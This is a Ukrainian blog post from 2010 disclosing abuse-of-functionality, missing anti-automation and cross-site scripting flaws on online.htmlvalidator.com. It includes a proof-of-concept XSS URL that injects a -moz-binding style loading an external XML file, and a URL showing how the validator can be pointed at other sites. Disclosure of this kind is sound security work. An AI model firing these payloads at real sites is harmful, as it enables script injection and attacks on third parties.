Уразливості на online.htmlvalidator.com

15:08 08.12.2010

15.07.2010

В липні, 06.07.2008, я знайшов Abuse of Functionality, Insufficient Anti-automation та Cross-Site Scripting уразливості на проекті http://online.htmlvalidator.com (що також доступний на домені http://www.onlinewebcheck.com). Про що найближчим часом сповіщу адміністрацію проекту.

Подібно до уразливостей на www.w3.org, дану Abuse of Functionality уразливість можна використати для проведення атак на інші сайти.

Детальна інформація про уразливості з’явиться пізніше.

08.12.2010

Abuse of Functionality:

http://online.htmlvalidator.com/php/onlinevallite.php?url=http://site

Даний функціонал може використовуватися для атаки на інші сайти. А також для проведення DoS атаки на сам сайт.

Insufficient Anti-automation:

В даному функціоналі немає захисту від автоматизованих запитів (капчі). Обмеження на один запит в 5 секунд з одного IP не вирішує задачу.

XSS:

http://online.htmlvalidator.com/php/onlinevallite.php?url=http://htmlvalidator.com/?%22%20style=%22-moz-binding:url('http://websecurity.com.ua/webtools/xss.xml%23xss')

Якщо XSS уразливість вже виправлена, то Abuse of Functionality та IAA уразливості досі не виправлені.


Leave a Reply

You must be logged in to post a comment.